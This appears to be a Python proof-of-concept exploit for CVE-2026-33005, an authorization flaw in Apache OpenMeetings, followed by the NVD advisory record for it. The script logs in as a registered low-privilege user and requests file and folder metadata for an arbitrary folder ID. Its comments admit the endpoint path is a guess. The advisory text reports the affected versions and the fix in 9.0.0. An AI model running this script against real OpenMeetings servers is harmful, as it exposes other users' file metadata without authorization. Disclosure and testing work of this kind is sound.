CVE-2026-33005

import requests # Proof of Concept for CVE-2026-33005 # Vulnerability: Improper Handling of Insufficient Privileges in Apache OpenMeetings # Impact: Low-privilege users can access file metadata of arbitrary folders. TARGET_HOST = "http://example-openmeetings.com" USERNAME = "attacker" PASSWORD = "password" TARGET_FOLDER_ID = "1" # ID of the folder to inspect def main(): session = requests.Session() # Step 1: Login to get a valid session/cookie login_url = f"{TARGET_HOST}/services/user/login" login_data = { "username": USERNAME, "userpass": PASSWORD } try: print(f"[+] Attempting login as {USERNAME}...") r = session.post(login_url, json=login_data) if r.status_code != 200: print("[-] Login failed.") return print("[+] Login successful.") # Step 2: Request file metadata for a specific folder ID # The endpoint might be /services/room/file/list/{roomId} or similar depending on API version # Here we simulate a request to fetch file items by ID exploit_url = f"{TARGET_HOST}/services/room/file/{TARGET_FOLDER_ID}" print(f"[+] Fetching metadata for folder ID: {TARGET_FOLDER_ID}") response = session.get(exploit_url) if response.status_code == 200: print("[+] Request successful!") print("[+] Response Data:") try: print(response.json()) except ValueError: print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-33005", "sourceIdentifier": "[email protected]", "published": "2026-04-09T16:16:26.823", "lastModified": "2026-04-15T15:27:05.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Handling of Insufficient Privileges vulnerability in Apache OpenMeetings.\n\nAny registered user can query web service with their credentials and get files/sub-folders of any folder by ID (metadata only NOT contents). Metadata includes id, type, name and some other field. Full list of fields get be checked at FileItemDTO object.\n\nThis issue affects Apache OpenMeetings: from 3.10 before 9.0.0.\n\nUsers are recommended to upgrade to version 9.0.0, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-274"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:openmeetings:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.1.0", "versionEndExcluding": "9.0.0", "matchCriteriaId": "DDF05947-6FA6-438F-83E5-F484EC43F6B2"}]}]}], "references": [{"url": "https://lists.apache.org/thread/pttoprd628g3xr6lpp3bm1z8m3z8t4p7", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://openmeetings.apache.org/openmeetings-db/apidocs/org.apache.openmeetings.db/org/apache/openmeetings/db/dto/file/FileItemDTO.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/09/10", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}